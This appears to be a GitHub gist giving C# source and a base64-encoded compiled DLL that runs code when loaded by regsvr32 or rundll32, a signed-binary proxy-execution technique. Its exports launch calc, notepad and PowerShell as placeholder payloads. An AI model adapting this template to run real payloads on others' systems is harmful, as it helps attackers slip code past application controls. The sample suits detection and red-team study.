Skip to content

Instantly share code, notes, and snippets.

@nicholasmckinney
Created May 8, 2017 00:33
Show Gist options
  • Save nicholasmckinney/04ad4cbf6bbcedb00adb85dd3c49d270 to your computer and use it in GitHub Desktop.
Save nicholasmckinney/04ad4cbf6bbcedb00adb85dd3c49d270 to your computer and use it in GitHub Desktop.
Execute a DLL via Regsvr32
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{
//
//
//rundll32 entry point
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow )
{
ProcessStartInfo info = new ProcessStartInfo();
info.FileName = "calc.exe";
Process.Start(info);
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllRegisterServer()
{
ProcessStartInfo info = new ProcessStartInfo();
info.FileName = "notepad.exe";
Process.Start(info);
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllUnregisterServer()
{
ProcessStartInfo info = new ProcessStartInfo();
info.FileName = "powershell.exe";
Process.Start(info);
}
// To call/execute simply
// regsvr32 /u evil.dll -->Calls DllUnregisterServer
// [OR]
// regsvr32 evil.dll --> Calls DllRegisterServer
}
}
Base64 Encoded Sample (.NET 2.0 or Higher x64)
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3wAuADsABwEuAEMAGQEuAEsAEwEuAFMAEwEuAFsAMQEuAGMAWwEIAAYAPwAEgAAAAQAAAAAAAAAAAAAAAAB0AgAAAgAAAAAAAAAAAAAAIABjAgAAAAACAAAAAAAAAAAAAAAgAPsBAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQAuY3RvcgBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5TZWN1cml0eS5QZXJtaXNzaW9ucwBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAU3lzdGVtLlNlY3VyaXR5AFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUAU3lzdGVtAE9iamVjdABDYWxsQ29udlN0ZGNhbGwAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NTdGFydEluZm8Ac2V0X0ZpbGVOYW1lAFByb2Nlc3MAU3RhcnQARXhwb3J0LmRsbABtc2NvcmxpYgBQcm9ncmFtAEV4cG9ydABUZXN0AE1haW4AYXJncwBFbnRyeVBvaW50AGh3bmQAaGluc3QAbHBzekNtZExpbmUAbkNtZFNob3cARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZlcgAAABFjAGEAbABjAC4AZQB4AGUAABduAG8AdABlAHAAYQBkAC4AZQB4AGUAAB1wAG8AdwBlAHIAcwBoAGUA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
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment